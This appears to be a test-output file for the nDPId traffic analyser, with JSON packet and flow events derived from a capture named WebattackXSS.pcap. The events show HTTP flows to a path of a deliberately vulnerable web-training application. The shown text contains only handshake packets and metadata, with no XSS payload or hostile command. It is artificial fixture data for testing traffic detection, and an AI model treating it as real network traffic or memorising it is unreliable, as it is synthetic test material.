+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499346935283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wadAAD4GBCmsEAABwKgKMsuCAFAodgngAAAAAKACchCXWwAAAgQFtAQCCAoBOMhHAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499346935283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4I5j3VaKHYJ4aAScSBLsAAAAgQFtAQCCAoD4pm+ATjIRwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499346935285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wahAAD4GBDCsEAABwKgKMsuCAFAodgnhOY91W4AQAOXqtwAAAQEICgE4yEcD4pm+"} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346935283,"flow_last_seen":1499346935285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346935285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935343,"flow_last_seen":1499346935343,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935343,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499346935343,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IaBAAD4GpDCsEAABwKgKMsuEAFAW1en2AAAAAKACchDI1AAAAgQFtAQCCAoBOMhWAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499346935343,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4Rgmy17FtXp96AScSCd7QAAAgQFtAQCCAoD4pnNATjIVgEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499346935343,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935343,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IaFAAD4GpDesEAABwKgKMsuEAFAW1en3YJstfIAQAOU89QAAAQEICgE4yFYD4pnN"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935650,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZwtAAD4GXsWsEAABwKgKMsuWAFCoJa+oAAAAAKACchBxcwAAAgQFtAQCCAoBOMijAAAAAAEDAwc="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935650,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/9xAAD4GxfOsEAABwKgKMsuYAFCG7Dd\/AAAAAKACchAK1AAAAgQFtAQCCAoBOMijAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy5YT3KepqCWvqaAScSAY0AAAAgQFtAQCCAoD4poaATjIowEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy5hHE6nghuw3gKAScSB8wgAAAgQFtAQCCAoD4poaATjIowEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499346935651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZwxAAD4GXsysEAABwKgKMsuWAFCoJa+pE9ynqoAQAOW31wAAAQEICgE4yKMD4poa"} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499346935651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/91AAD4GxfqsEAABwKgKMsuYAFCG7DeARxOp4YAQAOUbygAAAQEICgE4yKMD4poa"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346956870,"flow_last_seen":1499346956870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346956870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499346956870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DqpAAD4GtyasEAABwKgKMsvoAFDxddP2AAAAAKACchDuyQAAAgQFtAQCCAoBON1cAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499346956870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+g57n8P8XXT96AScSCD9QAAAgQFtAQCCAoD4q7TATjdXAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499346956871,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346956871,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DqtAAD4Gty2sEAABwKgKMsvoAFDxddP3Oe5\/EIAQAOUi\/QAAAQEICgE43VwD4q7T"} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346956870,"flow_last_seen":1499346956871,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346956871,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346956932,"flow_last_seen":1499346956932,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346956932,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499346956932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nj9AAD4GJ5GsEAABwKgKMsvqAFAHDkNUAAAAAKACchBpwwAAAgQFtAQCCAoBON1rAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499346956932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+qiErzRBw5DVaAScSBY+QAAAgQFtAQCCAoD4q7iATjdawEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499346956933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346956933,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nkBAAD4GJ5isEAABwKgKMsvqAFAHDkNVohK80oAQAOX4AAAAAQEICgE43WsD4q7i"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346957283,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346957283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8F6tAAD4GriWsEAABwKgKMsv8AFD6EcpoAAAAAKACchDvQAAAAgQFtAQCCAoBON3DAAAAAAEDAwc="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346957283,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346957283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iOxAAD4GPOSsEAABwKgKMsv+AFCTelUvAAAAAKACchDLDwAAAgQFtAQCCAoBON3DAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy\/xzRrv9+hHKaaAScSANvwAAAgQFtAQCCAoD4q86ATjdwwEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy\/7+F1DJk3pVMKAScSDJ8AAAAgQFtAQCCAoD4q86ATjdwwEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499346957284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346957284,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0F6xAAD4GriysEAABwKgKMsv8AFD6Ecppc0a7\/oAQAOWsxgAAAQEICgE43cMD4q86"} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499346957284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346957284,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iO1AAD4GPOusEAABwKgKMsv+AFCTelUw\/hdQyoAQAOVo+AAAAQEICgE43cMD4q86"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976603,"flow_last_seen":1499346976603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976603,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499346976603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Un9AAD4Gc1GsEAABwKgKMsxKAFAevqLeAAAAAKACchDe8gAAAgQFtAQCCAoBOPChAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499346976603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEoKnmxhHr6i36AScSCi1wAAAgQFtAQCCAoD4sIYATjwoQEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499346976604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346976604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UoBAAD4Gc1isEAABwKgKMsxKAFAevqLfCp5sYoAQAOVB3wAAAQEICgE48KED4sIY"} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976603,"flow_last_seen":1499346976604,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346976604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976677,"flow_last_seen":1499346976677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976677,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1499346976677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8I8VAAD4GogusEAABwKgKMsxMAFCAL9N2AAAAAKACchBM1QAAAgQFtAQCCAoBOPCzAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1499346976677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEzfj2P1gC\/Td6AScSBEIgAAAgQFtAQCCAoD4sIqATjwswEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1499346976677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346976677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0I8ZAAD4GohKsEAABwKgKMsxMAFCAL9N3349j9oAQAOXjKAAAAQEICgE48LQD4sIq"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976999,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976999,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z5FAAD4GXj+sEAABwKgKMsxeAFDFSpaVAAAAAKACchBEOAAAAgQFtAQCCAoBOPEEAAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976999,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976999,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8v9RAAD4GBfysEAABwKgKMsxgAFByIk7QAAAAAKACchDfIwAAAgQFtAQCCAoBOPEEAAAAAAEDAwc="} 